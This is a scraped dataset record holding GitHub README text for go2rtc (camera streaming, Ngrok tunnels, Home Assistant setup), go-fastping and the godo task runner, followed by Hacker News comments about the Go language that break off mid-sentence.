Ngrok\n\nWith Ngrok integration you can get external access to your streams in situation when you have Internet with private IP-address.\n\n- Ngrok preistalled for **Docker** and **Hass Add-on** users\n- you may need external access for two different things:\n - WebRTC stream, so you need tunnel WebRTC TCP port (ex. 8555)\n - go2rtc web interface, so you need tunnel API HTTP port (ex. 1984)\n- Ngrok support authorization for your web interface\n- Ngrok automatically adds HTTPS to your web interface\n\nNgrok free subscription limitations:\n\n- you will always get random external address (not a problem for webrtc stream)\n- you can forward multiple ports but use only one Ngrok app\n\ngo2rtc will automatically get your external TCP address (if you enable it in ngrok config) and use it with WebRTC connection (if you enable it in webrtc config).\n\nYou need manually download [Ngrok agent app](https://ngrok.com/download) for your OS and register in [Ngrok service](https://ngrok.com/).\n\n**Tunnel for only WebRTC Stream**\n\nYou need to add your [Ngrok token](https://dashboard.ngrok.com/get-started/your-authtoken) and WebRTC TCP port to YAML:\n\n```yaml\nngrok:\n command: ngrok tcp 8555 --authtoken eW91IHNoYWxsIG5vdCBwYXNzCnlvdSBzaGFsbCBub3QgcGFzcw\n```\n\n**Tunnel for WebRTC and Web interface**\n\nYou need to create `ngrok.yaml` config file and add it to go2rtc config:\n\n```yaml\nngrok:\n command: ngrok start --all --config ngrok.yaml\n```\n\nNgrok config example:\n\n```yaml\nversion: \"2\"\nauthtoken: eW91IHNoYWxsIG5vdCBwYXNzCnlvdSBzaGFsbCBub3QgcGFzcw\ntunnels:\n api:\n addr: 1984 # use the same port as in go2rtc config\n proto: http\n basic_auth:\n - admin:password # you can set login/pass for your web interface\n webrtc:\n addr: 8555 # use the same port as in go2rtc config\n proto: tcp\n```\n\n### Module: Hass\n\nThe best and easiest way to use go2rtc inside the Home Assistant is to install the custom integration [WebRTC Camera](#go2rtc-home-assistant-integration) and custom lovelace card.\n\nBut go2rtc is also compatible and can be used with [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) built-in integration.\n\nYou have several options on how to add a camera to Home Assistant:\n\n1. Camera RTSP source => [Generic Camera](https://www.home-assistant.io/integrations/generic/)\n2. Camera [any source](#module-streams) => [go2rtc config](#configuration) => [Generic Camera](https://www.home-assistant.io/integrations/generic/)\n - Install any [go2rtc](#fast-start)\n - Add your stream to [go2rtc config](#configuration)\n - Hass > Settings > Integrations > Add Integration > [Generic Camera](https://my.home-assistant.io/redirect/config_flow_start/?domain=generic) > `rtsp://127.0.0.1:8554/camera1` (change to your stream name)\n\nYou have several options on how to watch the stream from the cameras in Home Assistant:\n\n1. `Camera Entity` => `Picture Entity Card` => Technology `HLS`, codecs: `H264/H265/AAC`, poor latency.\n2. `Camera Entity` => [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) => `Picture Entity Card` => Technology `WebRTC`, codecs: `H264/PCMU/PCMA/OPUS`, best latency.\n - Install any [go2rtc](#fast-start)\n - Hass > Settings > Integrations > Add Integration > [RTSPtoWebRTC](https://my.home-assistant.io/redirect/config_flow_start/?domain=rtsp_to_webrtc) > `http://127.0.0.1:1984/`\n - RTSPtoWebRTC > Configure > STUN server: `stun.l.google.com:19302`\n - Use Picture Entity or Picture Glance lovelace card\n3. `Camera Entity` or `Camera URL` => [WebRTC Camera](https://github.com/AlexxIT/WebRTC) => Technology: `WebRTC/MSE/MP4/MJPEG`, codecs: `H264/H265/AAC/PCMU/PCMA/OPUS`, best latency, best compatibility.\n - Install and add [WebRTC Camera](https://github.com/AlexxIT/WebRTC) custom integration\n - Use WebRTC Camera custom lovelace card\n\nYou can add camera `entity_id` to [go2rtc config](#configuration) if you need transcoding:\n\n```yaml\nstreams:\n \"camera.hall\": ffmpeg:{input}#video=copy#audio=opus\n```\n\nPS. Default Home Assistant lovelace cards don't support 2-way audio. You can use 2-way audio from [Add-on Web UI](https://my.home-assistant.io/redirect/supervisor_addon/?addon=a889bffc_go2rtc&repository_url=https%3A%2F%2Fgithub.com%2FAlexxIT%2Fhassio-addons). But you need use HTTPS to access the microphone. This is a browser restriction and cannot be avoided.\n\n### Module: MP4\n\nProvides several features:\n\n1. MSE stream (fMP4 over WebSocket)\n2. Camera snapshots in MP4 format (single frame), can be sent to [Telegram](https://github.com/AlexxIT/go2rtc/wiki/Snapshot-to-Telegram)\n3. MP4 \"file stream\" - bad format for streaming because of high start delay. This format doesn't work in all Safari browsers, but go2rtc will automatically redirect it to HLS/fMP4 it this case.\n\nAPI examples:\n\n- MP4 stream: `http://192.168.1.123:1984/api/stream.mp4?src=camera1`\n- MP4 snapshot: `http://192.168.1.123:1984/api/frame.mp4?src=camera1`\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: HLS\n\n[HLS](https://en.wikipedia.org/wiki/HTTP_Live_Streaming) is the worst technology for real-time streaming. It can only be useful on devices that do not support more modern technology, like [WebRTC](#module-webrtc), [MSE/MP4](#module-mp4).\n\nThe go2rtc implementation differs from the standards and may not work with all players.\n\nAPI examples:\n\n- HLS/TS stream: `http://192.168.1.123:1984/api/stream.m3u8?src=camera1` (H264)\n- HLS/fMP4 stream: `http://192.168.1.123:1984/api/stream.m3u8?src=camera1&mp4` (H264, H265, AAC)\n\nRead more about [codecs filters](#codecs-filters).\n\n### Module: MJPEG\n\n**Important.** For stream as MJPEG format, your source MUST contain the MJPEG codec. If your stream has a MJPEG codec - you can receive **MJPEG stream** or **JPEG snapshots** via API.\n\nYou can receive an MJPEG stream in several ways:\n\n- some cameras support MJPEG codec inside [RTSP stream](#source-rtsp) (ex. second stream for Dahua cameras)\n- some cameras has HTTP link with [MJPEG stream](#source-http)\n- some cameras has HTTP link with snapshots - go2rtc can convert them to [MJPEG stream](#source-http)\n- you can convert H264/H265 stream from your camera via [FFmpeg integraion](#source-ffmpeg)\n\nWith this example, your stream will have both H264 and MJPEG codecs:\n\n```yaml\nstreams:\n camera1:\n - rtsp://rtsp:12345678@192.168.1.123/av_stream/ch0\n - ffmpeg:camera1#video=mjpeg\n```\n\nAPI examples:\n\n- MJPEG stream: `http://192.168.1.123:1984/api/stream.mjpeg?src=camera1`\n- JPEG snapshots: `http://192.168.1.123:1984/api/frame.jpeg?src=camera1`\n\n### Module: Log\n\nYou can set different log levels for different modules.\n\n```yaml\nlog:\n level: info # default level\n api: trace\n exec: debug\n ngrok: info\n rtsp: warn\n streams: error\n webrtc: fatal\n```\n\n## Security\n\nBy default `go2rtc` starts the Web interface on port `1984` and RTSP on port `8554`, as well as use port `8555` for WebRTC connections. The three ports are accessible from your local network. So anyone on your local network can watch video from your cameras without authorization. The same rule applies to the Home Assistant Add-on.\n\nThis is not a problem if you trust your local network as much as I do. But you can change this behaviour with a `go2rtc.yaml` config:\n\n```yaml\napi:\n listen: \"127.0.0.1:1984\" # localhost\n\nrtsp:\n listen: \"127.0.0.1:8554\" # localhost\n\nwebrtc:\n listen: \":8555\" # external TCP/UDP port\n```\n\n- local access to RTSP is not a problem for [FFmpeg](#source-ffmpeg) integration, because it runs locally on your server\n- local access to API is not a problem for [Home Assistant Add-on](#go2rtc-home-assistant-add-on), because Hass runs locally on same server and Add-on Web UI protected with Hass authorization ([Ingress feature](https://www.home-assistant.io/blog/2019/04/15/hassio-ingress/))\n- external access to WebRTC TCP port is not a problem, because it used only for transmit encrypted media data\n - anyway you need to open this port to your local network and to the Internet in order for WebRTC to work\n\nIf you need Web interface protection without Home Assistant Add-on - you need to use reverse proxy, like [Nginx](https://nginx.org/), [Caddy](https://caddyserver.com/), [Ngrok](https://ngrok.com/), etc.\n\nPS. Additionally WebRTC will try to use the 8555 UDP port for transmit encrypted media. It works without problems on the local network. And sometimes also works for external access, even if you haven't opened this port on your router ([read more](https://en.wikipedia.org/wiki/UDP_hole_punching)). But for stable external WebRTC access, you need to open the 8555 port on your router for both TCP and UDP.\n\n## Codecs filters\n\ngo2rtc can automatically detect which codecs your device supports for [WebRTC](#module-webrtc) and [MSE](#module-mp4) technologies.\n\nBut it cannot be done for [RTSP](#module-rtsp), [stream.mp4](#module-mp4), [HLS](#module-hls) technologies. You can manually add a codec filter when you create a link to a stream. The filters work the same for all three technologies. Filters do not create a new codec. They only select the suitable codec from existing sources. You can add new codecs to the stream using the [FFmpeg transcoding](#source-ffmpeg).\n\nWithout filters:\n\n- RTSP will provide only the first video and only the first audio\n- MP4 will include only compatible codecs (H264, H265, AAC)\n- HLS will output in the legacy TS format (H264 without audio)\n\nSome examples:\n\n- `rtsp://192.168.1.123:8554/camera1?mp4` - useful for recording as MP4 files (e.g. Hass or Frigate)\n- `rtsp://192.168.1.123:8554/camera1?video=h264,h265&audio=aac` - full version of the filter above\n- `rtsp://192.168.1.123:8554/camera1?video=h264&audio=aac&audio=opus` - H264 video codec and two separate audio tracks\n- `rtsp://192.168.1.123:8554/camera1?video&audio=all` - any video codec and all audio codecs as separate tracks\n- `http://192.168.1.123:1984/api/stream.m3u8?src=camera1&mp4` - HLS stream with MP4 compatible codecs (HLS/fMP4)\n- `http://192.168.1.123:1984/api/stream.mp4?src=camera1&video=h264,h265&audio=aac,opus,mp3,pcma,pcmu` - MP4 file with non standard audio codecs, does not work in some players\n\n## Codecs madness\n\n`AVC/H.264` video can be played almost anywhere. But `HEVC/H.265` has a lot of limitations in supporting with different devices and browsers. It's all about patents and money, you can't do anything about it.\n\n| Device | WebRTC | MSE | stream.mp4 |\n|---------------------|-------------------------------|------------------------|-----------------------------------------|\n| *latency* | best | medium | bad |\n| Desktop Chrome 107+ | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, H265*, AAC, OPUS, PCMU, PCMA, MP3 |\n| Desktop Edge | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, H265*, AAC, OPUS, PCMU, PCMA, MP3 |\n| Desktop Safari | H264, H265*, OPUS, PCMU, PCMA | H264, H265, AAC | **no!** |\n| Desktop Firefox | H264, OPUS, PCMU, PCMA | H264, AAC, OPUS | H264, AAC, OPUS |\n| Android Chrome 107+ | H264, OPUS, PCMU, PCMA | H264, H265*, AAC, OPUS | H264, ?, AAC, OPUS, PCMU, PCMA, MP3 |\n| iPad Safari 13+ | H264, H265*, OPUS, PCMU, PCMA | H264, H265, AAC | **no!** |\n| iPhone Safari 13+ | H264, H265*, OPUS, PCMU, PCMA | **no!** | **no!** |\n| masOS Hass App | no | no | no |\n\n- Chrome H265: [read this](https://chromestatus.com/feature/5186511939567616) and [read this](https://github.com/StaZhu/enable-chromium-hevc-hardware-decoding)\n- Edge H265: [read this](https://www.reddit.com/r/MicrosoftEdge/comments/v9iw8k/enable_hevc_support_in_edge/)\n- Desktop Safari H265: Menu > Develop > Experimental > WebRTC H265\n- iOS Safari H265: Settings > Safari > Advanced > Experimental > WebRTC H265\n\n**Audio**\n\n- **WebRTC** audio codecs: `PCMU/8000`, `PCMA/8000`, `OPUS/48000/2`\n- `OPUS` and `MP3` inside **MP4** is part of the standard, but some players do not support them anyway (especially Apple)\n- `PCMU` and `PCMA` inside **MP4** isn't a standard, but some players support them, for example Chromium browsers\n\n**Apple devices**\n\n- all Apple devices don't support MP4 stream (they only support progressive loading of static files)\n- iPhones don't support MSE technology because it competes with the HLS technology, invented by Apple\n- HLS is the worst technology for **live** streaming, it still exists only because of iPhones\n\n## Codecs negotiation\n\nFor example, you want to watch RTSP-stream from [Dahua IPC-K42](https://www.dahuasecurity.com/fr/products/All-Products/Network-Cameras/Wireless-Series/Wi-Fi-Series/4MP/IPC-K42) camera in your Chrome browser.\n\n- this camera support 2-way audio standard **ONVIF Profile T**\n- this camera support codecs **H264, H265** for send video, and you select `H264` in camera settings\n- this camera support codecs **AAC, PCMU, PCMA** for send audio (from mic), and you select `AAC/16000` in camera settings\n- this camera support codecs **AAC, PCMU, PCMA** for receive audio (to speaker), you don't need to select them\n- your browser support codecs **H264, VP8, VP9, AV1** for receive video, you don't need to select them\n- your browser support codecs **OPUS, PCMU, PCMA** for send and receive audio, you don't need to select them\n- you can't get camera audio directly, because its audio codecs doesn't match with your browser codecs\n - so you decide to use transcoding via FFmpeg and add this setting to config YAML file\n - you have chosen `OPUS/48000/2` codec, because it is higher quality than the `PCMU/8000` or `PCMA/8000`\n\nNow you have stream with two sources - **RTSP and FFmpeg**:\n\n```yaml\nstreams:\n dahua:\n - rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif\n - ffmpeg:rtsp://admin:password@192.168.1.123/cam/realmonitor?channel=1&subtype=0#audio=opus\n```\n\n**go2rtc** automatically match codecs for you browser and all your stream sources. This called **multi-source 2-way codecs negotiation**. And this is one of the main features of this app.\n\n![](assets/codecs.svg)\n\n**PS.** You can select `PCMU` or `PCMA` codec in camera setting and don't use transcoding at all. Or you can select `AAC` codec for main stream and `PCMU` codec for second stream and add both RTSP to YAML config, this also will work fine.\n\n## Projects using go2rtc\n\n- [Frigate 12+](https://frigate.video/) - open source NVR built around real-time AI object detection\n- [ring-mqtt](https://github.com/tsightler/ring-mqtt) - Ring devices to MQTT Bridge\n- [EufyP2PStream](https://github.com/oischinger/eufyp2pstream) - A small project that provides a Video/Audio Stream from Eufy cameras that don't directly support RTSP\n\n## Cameras experience\n\n- [Dahua](https://www.dahuasecurity.com/) - reference implementation streaming protocols, a lot of settings, high stream quality, multiple streaming clients\n- [Hikvision](https://www.hikvision.com/) - a lot of proprietary streaming technologies\n- [Reolink](https://reolink.com/) - some models has awful unusable RTSP realisation and not best HTTP-FLV alternative (I recommend that you contact Reolink support for new firmware), few settings\n- [Sonoff](https://sonoff.tech/) - very low stream quality, no settings, not best protocol implementation\n- [TP-Link](https://www.tp-link.com/) - few streaming clients, packet loss?\n- Chinese cheap noname cameras, Wyze Cams, Xiaomi cameras with hacks (usual has `/live/ch00_1` in RTSP URL) - awful but usable RTSP protocol realisation, low stream quality, few settings, packet loss?\n\n## TIPS\n\n**Using apps for low RTSP delay**\n\n- `ffplay -fflags nobuffer -flags low_delay \"rtsp://192.168.1.123:8554/camera1\"`\n- VLC > Preferences > Input / Codecs > Default Caching Level: Lowest Latency\n\n**Snapshots to Telegram**\n\n[read more](https://github.com/AlexxIT/go2rtc/wiki/Snapshot-to-Telegram)\n\n## FAQ\n\n**Q. What's the difference between go2rtc, WebRTC Camera and RTSPtoWebRTC?**\n\n**go2rtc** is a new version of the server-side [WebRTC Camera](https://github.com/AlexxIT/WebRTC) integration, completely rewritten from scratch, with a number of fixes and a huge number of new features. It is compatible with native Home Assistant [RTSPtoWebRTC](https://www.home-assistant.io/integrations/rtsp_to_webrtc/) integration. So you [can use](#module-hass) default lovelace Picture Entity or Picture Glance.\n\n**Q. Should I use go2rtc addon or WebRTC Camera integration?**\n\n**go2rtc** is more than just viewing your stream online with WebRTC/MSE/HLS/etc. You can use it all the time for your various tasks. But every time the Hass is rebooted - all integrations are also rebooted. So your streams may be interrupted if you use them in additional tasks.\n\nBasic users can use **WebRTC Camera** integration. Advanced users can use go2rtc addon or Frigate 12+ addon.\n\n**Q. Which RTSP link should I use inside Hass?**\n\nYou can use direct link to your cameras there (as you always do). **go2rtc** support zero-config feature. You may leave `streams` config section empty. And your streams will be created on the fly on first start from Hass. And your cameras will have multiple connections. Some from Hass directly and one from **go2rtc**.\n\nAlso you can specify your streams in **go2rtc** [config file](#configuration) and use RTSP links to this addon. With additional features: multi-source [codecs negotiation](#codecs-negotiation) or FFmpeg [transcoding](#source-ffmpeg) for unsupported codecs. Or use them as source for Frigate. And your cameras will have one connection from **go2rtc**. And **go2rtc** will have multiple connection - some from Hass via RTSP protocol, some from your browser via WebRTC/MSE/HLS protocols.\n\nUse any config what you like.\n\n**Q. What about lovelace card with support 2-way audio?**\n\nAt this moment I am focused on improving stability and adding new features to **go2rtc**. Maybe someone could write such a card themselves. It's not difficult, I have [some sketches](https://github.com/AlexxIT/go2rtc/blob/master/www/webrtc.html).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tatsushid/go-fastping", "link": "https://github.com/tatsushid/go-fastping", "tags": [], "stars": 535, "description": "ICMP ping library for Go inspired by AnyEvent::FastPing Perl module", "lang": "Go", "repo_lang": "", "readme": "go-fastping\n===========\n\ngo-fastping is a Go language ICMP ping library, inspired by the `AnyEvent::FastPing`\nPerl module, for quickly sending ICMP ECHO REQUEST packets. Original Perl module\nis available at http://search.cpan.org/~mlehmann/AnyEvent-FastPing-2.01/\n\nAll original functions haven't been implemented yet.\n\n[![GoDoc](https://godoc.org/github.com/tatsushid/go-fastping?status.svg)](https://godoc.org/github.com/tatsushid/go-fastping)\n\n## Installation\n\nInstall and update with `go get -u github.com/tatsushid/go-fastping`\n\n## Examples\n\nImport this package and write\n\n```go\np := fastping.NewPinger()\nra, err := net.ResolveIPAddr(\"ip4:icmp\", os.Args[1])\nif err != nil {\n\tfmt.Println(err)\n\tos.Exit(1)\n}\np.AddIPAddr(ra)\np.OnRecv = func(addr *net.IPAddr, rtt time.Duration) {\n\tfmt.Printf(\"IP Addr: %s receive, RTT: %v\\n\", addr.String(), rtt)\n}\np.OnIdle = func() {\n\tfmt.Println(\"finish\")\n}\nerr = p.Run()\nif err != nil {\n\tfmt.Println(err)\n}\n```\n\nThe example sends an ICMP packet and waits for a response. If it receives a\nresponse, it calls the \"receive\" callback. After that, once MaxRTT time has\npassed, it calls the \"idle\" callback. For more details,\nrefer [to the godoc][godoc], and if you need more examples,\nplease see \"cmd/ping/ping.go\".\n\n## Caution\nThis package implements ICMP ping using both raw socket and UDP. If your program\nuses this package in raw socket mode, it needs to be run as a root user.\n\n## License\ngo-fastping is under MIT License. See the [LICENSE][license] file for details.\n\n[godoc]: http://godoc.org/github.com/tatsushid/go-fastping\n[license]: https://github.com/tatsushid/go-fastping/blob/master/LICENSE\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-godo/godo", "link": "https://github.com/go-godo/godo", "tags": ["go", "task-runner", "build", "watcher"], "stars": 535, "description": "golang build tool in the spirt of rake, gulp", "lang": "Go", "repo_lang": "", "readme": "**Documentation is WIP**\n\n# godo\n\n[![GoDoc](https://godoc.org/github.com/go-godo/godo?status.svg)](https://godoc.org/github.com/go-godo/godo)\n\ngodo is a task runner and file watcher for golang in the spirit of\nrake, gulp.\n\nTo install\n\n go get -u gopkg.in/godo.v2/cmd/godo\n\n## Godofile\n\nGodo runs `Gododir/main.go`.\n\nAs an example, create a file **Gododir/main.go** with this content\n\n```go\npackage main\n\nimport (\n \"fmt\"\n do \"gopkg.in/godo.v2\"\n)\n\nfunc tasks(p *do.Project) {\n do.Env = `GOPATH=.vendor::$GOPATH`\n\n p.Task(\"default\", do.S{\"hello\", \"build\"}, nil)\n\n p.Task(\"hello\", nil, func(c *do.Context) {\n name := c.Args.AsString(\"name\", \"n\")\n if name == \"\" {\n c.Bash(\"echo Hello $USER!\")\n } else {\n fmt.Println(\"Hello\", name)\n }\n })\n\n p.Task(\"assets?\", nil, func(c *do.Context) {\n // The \"?\" tells Godo to run this task ONLY ONCE regardless of\n // how many tasks depend on it. In this case watchify watches\n // on its own.\n\t c.Run(\"watchify public/js/index.js d -o dist/js/app.bundle.js\")\n }).Src(\"public/**/*.{css,js,html}\")\n\n p.Task(\"build\", do.S{\"views\", \"assets\"}, func(c *do.Context) {\n c.Run(\"GOOS=linux GOARCH=amd64 go build\", do.M{\"$in\": \"cmd/server\"})\n }).Src(\"**/*.go\")\n\n p.Task(\"server\", do.S{\"views\", \"assets\"}, func(c *do.Context) {\n // rebuilds and restarts when a watched file changes\n c.Start(\"main.go\", do.M{\"$in\": \"cmd/server\"})\n }).Src(\"server/**/*.go\", \"cmd/server/*.{go,json}\").\n Debounce(3000)\n\n p.Task(\"views\", nil, func(c *do.Context) {\n c.Run(\"razor templates\")\n }).Src(\"templates/**/*.go.html\")\n}\n\nfunc main() {\n do.Godo(tasks)\n}\n```\n\nTo run \"server\" task from parent dir of `Gododir/`\n\n godo server\n\nTo rerun \"server\" and its dependencies whenever any of their watched files change\n\n godo server --watch\n\nTo run the \"default\" task which runs \"hello\" and \"build\"\n\n godo\n\nTask names may add a \"?\" suffix to execute only once even when watching\n\n```go\n// build once regardless of number of dependents\np.Task(\"assets?\", nil, func(*do.Context) { })\n```\n\nTask dependencies\n\n do.S{} or do.Series{} - dependent tasks to run in series\n do.P{} or do.Parallel{} - dependent tasks to run in parallel\n\n For example, do.S{\"clean\", do.P{\"stylesheets\", \"templates\"}, \"build\"}\n\n\n### Task Option Funcs\n\n* Task#Src() - specify watch paths or the src files for Task#Dest()\n\n Glob patterns\n\n /**/ - match zero or more directories\n {a,b} - match a or b, no spaces\n * - match any non-separator char\n ? - match a single non-separator char\n **/ - match any directory, start of pattern only\n /** - match any in this directory, end of pattern only\n ! - removes files from result set, start of pattern only\n\n* Task#Dest(globs ...string) - If globs in Src are newer than Dest, then\n the task is run\n\n* Task#Desc(description string) - Set task's description in usage.\n\n* Task#Debounce(duration time.Duration) - Disallow a task from running until duration\n has elapsed.\n\n* Task#Deps(names ...interface{}) - Can be `S, Series, P, Parallel, string`\n\n\n### Task CLI Arguments\n\nTask CLI arguments follow POSIX style flag convention\n(unlike go's built-in flag package). Any command line arguments\nsucceeding `--` are passed to each task. Note, arguments before `--`\nare reserved for `godo`.\n\nAs an example,\n\n```go\np.Task(\"hello\", nil, func(c *do.Context) {\n // \"(none)\" is the default value\n msg := c.Args.MayString(\"(none)\", \"message\", \"msg\", \"m\")\n var name string\n if len(c.Args.NonFlags()) == 1 {\n name = c.Args.NonFlags()[0]\n }\n fmt.Println(msg, name)\n})\n```\n\nrunning\n\n```sh\n# prints \"(none)\"\ngodo hello\n\n# prints \"Hello dude\" using POSIX style flags\ngodo hello -- dude --message Hello\ngodo hello -- dude --msg Hello\ngodo hello -- -m Hello dude\n```\n\nArgs functions are categorized as\n\n* `Must*` - Argument must be set by user or panic.\n\n ```go\nc.Args.MustInt(\"number\", \"n\")\n```\n\n* `May*` - If argument is not set, default to first value.\n\n ```go\n// defaults to 100\nc.Args.MayInt(100, \"number\", \"n\")\n```\n\n* `As*` - If argument is not set, default to zero value.\n\n ```go\n// defaults to 0\nc.Args.AsInt(\"number\", \"n\")\n```\n\n\n## Modularity and Namespaces\n\nA project may include other tasks functions with `Project#Use`. `Use` requires a namespace to\nprevent task name conflicts with existing tasks.\n\n```go\nfunc buildTasks(p *do.Project) {\n p.Task(\"default\", S{\"clean\"}, nil)\n\n p.Task(\"clean\", nil, func(*do.Context) {\n fmt.Println(\"build clean\")\n })\n}\n\nfunc tasks(p *do.Project) {\n p.Use(\"build\", buildTasks)\n\n p.Task(\"clean\", nil, func(*do.Context) {\n fmt.Println(\"root clean\")\n })\n\n p.Task(\"build\", do.S{\"build:default\"}, func(*do.Context) {\n fmt.Println(\"root clean\")\n })\n}\n```\n\nRunning `godo build:.` or `godo build` results in output of `build clean`. Note that\nit uses the `clean` task in its namespace not the `clean` in the parent project.\n\nThe special name `build:.` is alias for `build:default`.\n\nTask dependencies that start with `\"/\"` are relative to the parent project and\nmay be called referenced from sub projects.\n\n## godobin\n\n`godo` compiles `Godofile.go` to `godobin-VERSION` (`godobin-VERSION.exe` on Windows) whenever\n`Godofile.go` changes. The binary file is built into the same directory as\n`Godofile.go` and should be ignored by adding the path `godobin*` to `.gitignore`.\n\n## Exec functions\n\nAll of these functions accept a `map[string]interface{}` or `M` for\noptions. Option keys that start with `\"$\"` are reserved for `godo`.\nOther fields can be used as context for template.\n\n### Bash\n\nBash functions uses the bash executable and may not run on all OS.\n\nRun a bash script string. The script can be multiline line with continutation.\n\n```go\nc.Bash(`\n echo -n $USER\n echo some really long \\\n command\n`)\n```\n\nBash can use Go templates\n\n```go\nc.Bash(`echo -n {{.name}}`, do.M{\"name\": \"mario\", \"$in\": \"cmd/bar\"})\n```\n\nRun a bash script and capture STDOUT and STDERR.\n\n```go\noutput, err := c.BashOutput(`echo -n $USER`)\n```\n\n### Run\n\nRun `go build` inside of cmd/app and set environment variables.\n\n```go\nc.Run(`GOOS=linux GOARCH=amd64 go build`, do.M{\"$in\": \"cmd/app\"})\n```\n\nRun can use Go templates\n\n```go\nc.Run(`echo -n {{.name}}`, do.M{\"name\": \"mario\", \"$in\": \"cmd/app\"})\n```\n\nRun and capture STDOUT and STDERR\n\n```go\noutput, err := c.RunOutput(\"whoami\")\n```\n\n### Start\n\nStart an async command. If the executable has suffix \".go\" then it will be \"go install\"ed then executed.\nUse this for watching a server task.\n\n```go\nc.Start(\"main.go\", do.M{\"$in\": \"cmd/app\"})\n```\n\nGodo tracks the process ID of started processes to restart the app gracefully.\n\n### Inside\n\nTo run many commands inside a directory, use `Inside` instead of the `$in` option.\n`Inside` changes the working directory.\n\n```go\ndo.Inside(\"somedir\", func() {\n do.Run(\"...\")\n do.Bash(\"...\")\n})\n```\n\n## User Input\n\nTo get plain string\n\n```go\nuser := do.Prompt(\"user: \")\n```\n\nTo get password\n\n```go\npassword := do.PromptPassword(\"password: \")\n```\n\n## Godofile Run-Time Environment\n\n### From command-line\n\nEnvironment variables may be set via key-value pairs as arguments to\ngodo. This feature was added to facilitate users on Windows.\n\n```sh\ngodo NAME=mario GOPATH=./vendor hello\n```\n\n### From source code\n\nTo specify whether to inherit from parent's process environment,\nset `InheritParentEnv`. This setting defaults to true\n\n```go\ndo.InheritParentEnv = false\n```\n\nTo specify the base environment for your tasks, set `Env`.\nSeparate with whitespace or newlines.\n\n```go\ndo.Env = `\n GOPATH=.vendor::$GOPATH\n PG_USER=mario\n`\n```\n\nFunctions can add or override environment variables as part of the command string.\nNote that environment variables are set before the executable similar to a shell;\nhowever, the `Run` and `Start` functions do not use a shell.\n\n```go\np.Task(\"build\", nil, func(c *do.Context) {\n c.Run(\"GOOS=linux GOARCH=amd64 go build\" )\n})\n```\n\nThe effective environment for exec functions is: `parent (if inherited) <- do.Env <- func parsed env`\n\nPaths should use `::` as a cross-platform path list separator. On Windows `::` is replaced with `;`.\nOn Mac and linux `::` is replaced with `:`.\n\n### From godoenv file\n\nFor special circumstances where the GOPATH needs to be set before building the Gododir,\nuse `Gododir/godoenv` file.\n\nTIP: Create `Gododir/godoenv` when using a dependency manager like `godep` that necessitates\nchanging `$GOPATH`\n\n```\n# Gododir/godoenv\nGOPATH=$PWD/cmd/app/Godeps/_workspace::$GOPATH\n```\n", "readme_type": "markdown", "hn_comments": "wow if i search \"dash favicon\" it gives me the top voted SO post in a dropdownThis has been posted several times already: https://news.ycombinator.com/from?site=bluxte.netI wonder if in terms of GC Go still has an advantage over Java now that ZGC and Shenandoah are here. Though from what I understand you have to choose between GraalVM or one of the new GCs/some heavy reflection.> As you probably guessed, I have a love/hate relation with Go. Go is a bit like this friend that you like to hang out with because he's fun and great for small talk around beers, but that you find boring or painful when you want to have deeper conversations, and that you don't want to go on vacation with.That's a really good way of describing my feelings too, though I would describe it as a collegue more than a friend. I can see why this could be a good thing for people though, at some point you may want to do day to day work with a reliable collegue and not a friend.Should add to title (2018) - not current & not reflective of updates to APIFrom the horses mouth (Rob Pike) on why they chose to do what they did in Go.https://www.youtube.com/watch?v=rFejpH_tAHMOpinions on programming languages are like arseholes in that everyone has one. So I'm far less interested in hearing people intellectualise over what they perceive to be good or bad qualities of a particular language (otherwise known as arguing personal opinion as irrefutable fact) and far more interested in seeing what what cool projects people can make. After all, many of us managed to write some pretty awesome stuff in BASIC back in the 70s and 80s so there's really no excuse these days given the tooling and hardware we now have available.Just another guy speaking subjectively of something he barely know.I agree with this article to a surprising degree.Generally i find that people complain about other things that i don't care about but this article was spot on when it comes to my believes.I don\u2019t think it\u2019s fair to say they ignored advances in modern programming languages. There are opinionated reasons for the omission of generics and they do make sense in the overall architecture of the language. At the end of the day it\u2019s about trade offs and ultimately my opinion is that, having written a lot of both C# and Go, I can see the pros and cons of feature sets. Its about choice of tool for the solution in mind. I\u2019m happy with that.Buffering channels doesn't avoid deadlocks. As I understand it: buffering is a performance feature; if your code isn't correct without buffered channels, it isn't correct.> Up to recently there wasn't really an alternative in the space that Go occupies, which is developing efficient native executables without incurring the pain of C or C++.That's just plain not true. There are so many languages that compile to machine code. So, so many.I thought this was a superlative article, that mentions many gotchas that I haven't seen collected into one place in this way.I strongly recommend it.> The standard JSON encoder/decoder doesn't allow providing a naming strategy to automate the conversionThis is dangerous. You should be tagging all your fields even if the name matches exactly because, especially if inconsistently applied, someone might not realize that they are changing public schema with a refactor. If tags are completely missing in your codebase, you have to research every single type to determine if it gets serialized to JSON somewhere (good luck).Avoiding magic is a feature.One of the changes no one seems to be talking about is in leadership. Rob, Robert, and Ken would agree on a feature going into Go before it did. Now Russ Cox is in sole control of the leadership. This is happening at a point when work such as Go 2 and vgo are happening.From a previous Go blog post by the same author:Go decided to use a foreign syntax to C++, C and Java programmers. They borrows forward declarations from BASIC (yep, you heard me rightBASIC), creating declarations that are backwards from what weve been using for close to 20 years\"Yep, you heard me right... BASIC\". Consider carefully how seriously you want to take this blog.It's worth noting that this post is from December 2009.Somebody criticizing a language he freely admits to never having used.Nothing interesting to see here.Ok, I will do this one more time.The authors of go come from my generation. Back in those days, the term \"Systems Programming\" meant something different than what wikipedia, and probably most everyone today thinks of it.Systems Programming in those days meant writing compilers, text processors, unix command line programs. It did not then mean programming an operating system, or anything near hard real-time.Not a very high quality article.Did the author change the title? It now reads \"Google Go: Good for what?\", although the article (or, for that matter, the link) still quite clearly suggests (and explicitly says at the end) that the answer is 'nothing'.A gross and incorrect generalization. It should have been:Go: Good here, bad there.Go is a young language with a growing community that should only get better as more minds come to it.For me it's very accessible for rapidly developing heavy-lifting tools, in particular networking tools. It's not the only language but it's served me well when I've reached for it.\"Id say there are plenty of non-starters to keep Go out of the application programming space.\"God, I've got tired of all 